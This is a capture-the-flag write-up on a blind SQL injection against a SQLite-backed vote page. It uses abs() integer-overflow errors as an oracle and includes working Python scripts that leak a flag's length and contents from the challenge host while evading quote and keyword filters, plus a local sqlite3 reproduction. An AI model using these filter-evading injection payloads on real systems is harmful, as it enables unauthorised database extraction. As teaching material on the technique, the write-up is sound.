Looking at the source, a lot of SQL keywords are filtered. The database is SQLite, so the usual MySQL bypasses may not apply, and since `"` and `'` are filtered I could not tell whether the injection point is string-typed or integer-typed. The challenge also shows a SQL statement up front, which tells us the flag is in the flag table. From here it is clearly a blind injection through this UPDATE. My idea was to use mid() in place of substr(); I tried XOR and parentheses instead of spaces, with no result. I looked SQLite up and it seems there is no ^ operator, so I went to the wp; I am not familiar with SQLite. (wp reference)

It turns out SQLite's abs() can be made to integer-overflow: abs() throws an error when its argument is -9223372036854775808, which is exactly what the hex literal 0x8000000000000000 evaluates to, because SQLite reads hex literals as 64-bit two's-complement integers. See the wp above for the details.
(The following part is optional reading.)
The wp uses a bitwise AND on the length of hex(flag) to determine the length of the flag in the flag table, another small detail. From the wp's payload I judged it to be an integer-type injection; too bad I am not familiar with SQLite. I slightly modified the wp's script:
```python
import requests

url = "http://9bc57f7c-3543-4dac-9a39-b0d6fe93990f.node3.buuoj.cn/vote.php"
l = 0
# Recover length(hex(flag)) one bit at a time: the CASE returns 0x8000000000000000
# (i.e. -9223372036854775808) whenever bit n is set, and abs() of that value
# raises "integer overflow", so an error page means the bit is 1.
for n in range(16):
    payload = 'abs(case(length(hex((select(flag)from(flag))))&{})when(0)then(0)else(0x8000000000000000)end)'.format(1 << n)
    data = {'id': payload}
    r = requests.post(url=url, data=data)
    print(data)
    print(r.text)
    if 'occurred' in r.text:
        l = l | 1 << n
print(l)
```

This determines the flag's length (the value of length(hex(flag))).
The extraction step uses replace(): if the candidate hex prefix is not in hex(flag), nothing is removed and the length stays 84 (the length(hex(flag)) found above, so a 42-byte flag); a case when then turns that into whether abs() errors or not. Learned something new.
```python
import binascii
import time

import requests

URL = 'http://9bc57f7c-3543-4dac-9a39-b0d6fe93990f.node3.buuoj.cn/vote.php'
l = 84  # length(hex(flag)) found by the previous script
header = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36'}

# Quotes are filtered, so each hex letter A-F is produced by an expression that
# evaluates to that single character: hex() of a known string (rows of the vote
# table, typeof(.1) = 'real', the text form of -1 and 0.1) with the unwanted
# characters trim()med off both ends.
table = {}
table['A'] = 'trim(hex((select(name)from(vote)where(case(id)when(3)then(1)end))),12567)'
table['C'] = 'trim(hex(typeof(.1)),12567)'
table['D'] = 'trim(hex(0xffffffffffffffff),123)'
table['E'] = 'trim(hex(0.1),1230)'
table['F'] = 'trim(hex((select(name)from(vote)where(case(id)when(1)then(1)end))),467)'
table['B'] = f'trim(hex((select(name)from(vote)where(case(id)when(4)then(1)end))),16||{table["C"]}||{table["F"]})'

res = binascii.hexlify(b'flag{').decode().upper()  # known prefix, uppercase like hex()
for i in range(len(res), l):
    for x in '0123456789ABCDEF':
        # digits are literal numbers, letters come from the table; '||' concatenates
        t = '||'.join(c if c in '0123456789' else table[c] for c in res + x)
        # replace() deletes the candidate from hex(flag); if it was present the
        # length is no longer 84, the outer replace() leaves a non-empty string,
        # and the CASE falls through to abs(0x8000000000000000) -> error page
        r = requests.post(URL, data={
            'id': f'abs(case(replace(length(replace(hex((select(flag)from(flag))),{t},trim(0,0))),{l},trim(0,0)))when(trim(0,0))then(0)else(0x8000000000000000)end)'
        }, headers=header)
        if 'An error occurred' in r.text:
            res += x
            break
        time.sleep(0.06)
    print('flag(hex): ', res)

print(binascii.unhexlify(res).decode())
```
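To check the two oracle shapes above (the bit-by-bit length leak and the replace()-based prefix extraction) without the challenge server, here is an added example that runs the same payloads against a local SQLite database through Python's built-in sqlite3 module. This is my own code, not the wp's or the challenge's: the flag value, the `vote`/`flag` schema and the exact UPDATE the id is spliced into are constructed assumptions, and the quote-free string literals are built with char() instead of the challenge-specific vote-table trim() tricks (assumption: char() is not filtered). Only the payload shapes are the ones from the writeup.

```python
import sqlite3

# Constructed stand-in for the challenge backend: a `flag` table with one row and
# a `vote` table for the UPDATE to hit.  The flag value and the exact UPDATE are
# assumptions; only the payload shapes are taken from the writeup.
FLAG = "flag{sqlite_abs_overflow_demo}"

OVERFLOW = "0x8000000000000000"  # hex literal = 64-bit two's complement -9223372036854775808
EMPTY = "trim(0,0)"              # a quote-free '': trim every '0' off the string '0'
FLAG_HEX = "hex((select(flag)from(flag)))"


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE flag(flag TEXT)")
    db.execute("INSERT INTO flag VALUES (?)", (FLAG,))
    db.execute("CREATE TABLE vote(id INTEGER PRIMARY KEY, name TEXT, votes INTEGER)")
    db.execute("INSERT INTO vote VALUES (1, 'candidate', 0)")
    return db


def oracle(db, expr):
    """Splice `expr` unquoted into the (assumed) vulnerable UPDATE and report
    whether SQLite raised.  abs() raises "integer overflow" for exactly one
    input, -9223372036854775808, so that error is the single leaked bit."""
    try:
        db.execute(f"UPDATE vote SET votes = votes + 1 WHERE id = {expr}")
        return False
    except sqlite3.OperationalError as e:
        if "integer overflow" not in str(e):
            raise  # a broken payload, not the oracle firing
        return True


def leak_length(db, bits=16):
    """length(hex(flag)) one bit at a time: the error fires iff bit n is set."""
    length = 0
    for n in range(bits):
        payload = (f"abs(case(length({FLAG_HEX})&{1 << n})"
                   f"when(0)then(0)else({OVERFLOW})end)")
        if oracle(db, payload):
            length |= 1 << n
    return length


def quoteless(s):
    """String literal without quote characters via char() (assumed unfiltered);
    the writeup instead assembled the hex letters from rows of the vote table."""
    return "char(" + ",".join(str(ord(c)) for c in s) + ")"


def leak_flag_hex(db, hex_len, known="666C61677B"):  # hex('flag{')
    """Extend the known hex prefix one nibble at a time.  replace() deletes the
    candidate from hex(flag); if it was present the length is no longer hex_len,
    the outer replace() leaves a non-empty string, the CASE misses the WHEN ''
    branch and abs(OVERFLOW) raises."""
    res = known
    while len(res) < hex_len:
        for x in "0123456789ABCDEF":
            payload = (f"abs(case(replace(length(replace({FLAG_HEX},{quoteless(res + x)},{EMPTY})),"
                       f"{hex_len},{EMPTY}))when({EMPTY})then(0)else({OVERFLOW})end)")
            if oracle(db, payload):
                res += x
                break
        else:
            raise RuntimeError("no nibble matched; is the known prefix really in hex(flag)?")
    return res


def recover_flag(db):
    hex_len = leak_length(db)
    return bytes.fromhex(leak_flag_hex(db, hex_len)).decode()


if __name__ == "__main__":
    db = make_db()
    print("length(hex(flag)) =", leak_length(db))  # 60 for the constructed flag
    print("flag =", recover_flag(db))
```

Two caveats worth knowing when reusing this. First, replace() removes every occurrence, so a candidate that appears somewhere else in hex(flag), even at an odd nibble offset, also fires the oracle; taking the first matching nibble is fine for this input but is an inherent ambiguity of the method. Second, the hex literal needs SQLite 3.8.6 or newer, which any current Python ships with.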